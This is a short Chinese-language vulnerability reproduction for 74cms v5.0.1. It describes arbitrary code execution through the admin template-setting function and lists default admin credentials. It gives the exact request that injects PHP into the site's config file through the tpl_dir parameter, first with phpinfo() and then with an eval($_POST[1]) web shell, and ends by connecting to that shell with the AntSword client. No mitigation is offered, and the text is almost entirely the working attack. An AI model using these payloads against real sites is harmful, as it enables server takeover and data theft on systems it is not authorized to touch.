一、漏洞概述
后台功能风格模板存在任意代码执行,后台账号密码均为adminadmin。
二、影响范围
Powered by 74cms v5.0.1
三、访问页面
/index.php?m=Admin&c=index&a=login
四、漏洞复现
1、点击可用模板,burp工具抓包
2、发送payload
/index.php?m=Admin&c=Tpl&a=set&tpl_dir=','a',phpinfo(),'
3、访问链接
/Application/Home/Conf/config.php
4、构造shell
/index.php?m=Admin&c=Tpl&a=set&tpl_dir=','a',eval($_POST[1]),'
5、使用蚁剑连接